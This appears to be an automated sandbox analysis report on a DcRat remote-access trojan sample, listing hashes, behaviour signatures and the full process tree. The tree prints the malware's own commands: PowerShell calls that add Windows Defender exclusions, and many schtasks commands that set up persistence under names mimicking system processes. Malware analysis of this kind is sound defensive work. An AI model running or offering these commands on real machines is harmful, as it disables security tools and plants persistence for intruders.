Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-12-2024 20:46

General

  • Target

    JaffaCakes118_2d38e2d2b3e13da39dfbeed8612fe37747722846b0d75495dbfaf73a7eb75e3a.exe

  • Size

    1.3MB

  • MD5

    32615ad6080d8fe652230bb4c70496a7

  • SHA1

    5dd7ca55e4d479aa054309f78225262ed35cc1d3

  • SHA256

    2d38e2d2b3e13da39dfbeed8612fe37747722846b0d75495dbfaf73a7eb75e3a

  • SHA512

    e8e79f81e355354d1cef17cf101fe2d815cb0b0147ef9cbb573d8cbf3fb1d847ffcbf7735d8a5b5bbc1379727de1cd72454ef45d87f9c9605a65beb2b90ce8e4

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 39 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 8 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 39 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_2d38e2d2b3e13da39dfbeed8612fe37747722846b0d75495dbfaf73a7eb75e3a.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_2d38e2d2b3e13da39dfbeed8612fe37747722846b0d75495dbfaf73a7eb75e3a.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2940
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\conhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2488
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2204
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\es-ES\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:696
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\sppsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Libraries\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:112
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2220
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Recent\dwm.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\explorer.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\NetHood\System.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3024
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\System\audiodg.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1052
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1432
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1460
          • C:\Users\Default User\conhost.exe
            "C:\Users\Default User\conhost.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2056
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gQkyN2upze.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1316
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:3012
                • C:\Users\Default User\conhost.exe
                  "C:\Users\Default User\conhost.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2692
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5irhJyFUC1.bat"
                    8⤵
                      PID:2568
                      • C:\Windows\system32\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        9⤵
                          PID:2152
                        • C:\Users\Default User\conhost.exe
                          "C:\Users\Default User\conhost.exe"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1472
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat"
                            10⤵
                              PID:2180
                              • C:\Windows\system32\w32tm.exe
                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                11⤵
                                  PID:1912
                                • C:\Users\Default User\conhost.exe
                                  "C:\Users\Default User\conhost.exe"
                                  11⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1588
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DegeIw2hse.bat"
                                    12⤵
                                      PID:1120
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        13⤵
                                          PID:2412
                                        • C:\Users\Default User\conhost.exe
                                          "C:\Users\Default User\conhost.exe"
                                          13⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:900
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wKGJ2NUoAL.bat"
                                            14⤵
                                              PID:1692
                                              • C:\Windows\system32\w32tm.exe
                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                15⤵
                                                  PID:2572
                                                • C:\Users\Default User\conhost.exe
                                                  "C:\Users\Default User\conhost.exe"
                                                  15⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2036
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wHaMzi6eYE.bat"
                                                    16⤵
                                                      PID:1560
                                                      • C:\Windows\system32\w32tm.exe
                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        17⤵
                                                          PID:2820
                                                        • C:\Users\Default User\conhost.exe
                                                          "C:\Users\Default User\conhost.exe"
                                                          17⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2180
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cxnNEsMM51.bat"
                                                            18⤵
                                                              PID:2852
                                                              • C:\Windows\system32\w32tm.exe
                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                19⤵
                                                                  PID:2772
                                                                • C:\Users\Default User\conhost.exe
                                                                  "C:\Users\Default User\conhost.exe"
                                                                  19⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1524
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6uGRILFBWR.bat"
                                                                    20⤵
                                                                      PID:2992
                                                                      • C:\Windows\system32\w32tm.exe
                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                        21⤵
                                                                          PID:2520
                                                                        • C:\Users\Default User\conhost.exe
                                                                          "C:\Users\Default User\conhost.exe"
                                                                          21⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3000
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat"
                                                                            22⤵
                                                                              PID:112
                                                                              • C:\Windows\system32\w32tm.exe
                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                23⤵
                                                                                  PID:2232
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\conhost.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2600
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:3012
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2964
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\providercommon\System.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2756
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2704
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2608
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Journal\es-ES\lsass.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2180
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\es-ES\lsass.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2900
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Journal\es-ES\lsass.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2152
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\sppsvc.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1484
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\sppsvc.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:376
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\sppsvc.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2120
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\csrss.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:336
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Libraries\csrss.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1616
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\csrss.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1644
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\providercommon\System.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1196
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2012
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:800
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1012
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1548
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1808
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Recent\dwm.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2960
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Admin\Recent\dwm.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2788
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Recent\dwm.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2952
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\System32\explorer.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2972
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\System32\explorer.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2268
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\System32\explorer.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2792
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\NetHood\System.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2344
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\System.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1132
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\NetHood\System.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2448
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Windows\Vss\Writers\System\audiodg.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2784
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\System\audiodg.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:832
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\Windows\Vss\Writers\System\audiodg.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:964
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\csrss.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2316
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\csrss.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1252
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\csrss.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2920
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\lsass.exe'" /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2272
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\lsass.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:900
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\lsass.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1688

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      9cc82abe96f746f1ef8e05d131554661

                                      SHA1

                                      00dd5f5c3881e60daf30f2678a84d70f816665ab

                                      SHA256

                                      f5246bc3177bf3322a4dfaafa009b9dbcbea49a2e67af4410360dfa07d8100e8

                                      SHA512

                                      be1e9ff8086814585ab469399859d4550cc68eb139ccae040d63cf949d6ef7bb8230faf3fd077ff81e0c53862585417af615b3319e7d0667ec449bac1d00e487

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      d3e9dfab5efcc94ceaa9be0c4a9722aa

                                      SHA1

                                      8c86be2269f76c84756c221a7ceee59901b1efa6

                                      SHA256

                                      bdca625a5e1f69f4ae6c8ed36bfef48623ed8a0d0277ff87aed544ec69e01e00

                                      SHA512

                                      0cba0c4cc3b778c0af9a3423cea1752e32778b90f54deafb01fa9f158dcfa859498ac74f2bec126dfbb0bb65f58adacd2850b59c57c7c9497d3acab461c02f29

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      0934b4995dfa33dbfc59d52cda6eec5d

                                      SHA1

                                      8019caa2e9d2a04d47528dfc8647a318606e57e7

                                      SHA256

                                      52e42b0093c8fad25d7ea428689ac1218337177595cf65084d7a4ff6110835cc

                                      SHA512

                                      a8d88b69cb4cc80b9cc0a30d786cdaea68042c67df82ab9ebc4c814d895bf342498e29251cd220c237ef470385e25fb8fc6f7d8acc710b3c3e8a4d08fa51f0d2

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      54ef0640fd133d0a7f7737f4db5eb1a1

                                      SHA1

                                      3b6c26d6ca1de59cf2ebd4c76e02f059053ffa65

                                      SHA256

                                      c917f0dd0295ee7bc38ead9753e5c096925c3f77750b433aa4eeb9c21e575c97

                                      SHA512

                                      a610c628ae5fbf1897f0cb31837cb96a6fde4df2416af7ef873f44fbaf184f48f8d79b8b16be9c73602e21b3cd4e741eb744d76128070a881b800b1218d41cd3

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      1b08daa1ade4cabe3380b4ce6748e70f

                                      SHA1

                                      4e2bd66b46874425922103a1e1afcabe539dcc2e

                                      SHA256

                                      478d8b099d7354db45e3f83f77b26710784b3d5d2cd89b7efa0119161378d97e

                                      SHA512

                                      8da0ffa555b177885c60c986fa5c50e8a84e7e4e17a4339c8f8700634a5a07056dce1f847fb5fbe6a45544ea78caeef312ab28d9b8453accb5e4c2b7e75fd17f

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      cca23af2ecc0bb0121f935bc43901083

                                      SHA1

                                      f978cd394edfab700e2b7561e690c9a9be9ba090

                                      SHA256

                                      6d264058ce8c1432af905c5a537aed704dc413ff237e9764ddcb267588223302

                                      SHA512

                                      70e0eea1bfdf74228ad677a49a84db0bcbf04b01ed655dee064a14862b21d67e9e8096de639be6234dcfac055af84e414d1b4fd0fd6be64ac0c68a48f2dda491

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      701581e7daf47f23ab0681e393401fee

                                      SHA1

                                      d1f3ce7113b6a05b51cb93be4af408400231773c

                                      SHA256

                                      4111778364c186306a4172e991adcebe10c196f838faa77846047eec95d12f76

                                      SHA512

                                      8a214bb3ab52c1c5cce69e6b904ac21328b74255a8c9841b6cce7f7c9ddb8b1c308275b677584287573030be47add448587983caccadcc9cf1c45a5cfdbb80fa

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      c8682c60b9671062ac57cfebb15557c4

                                      SHA1

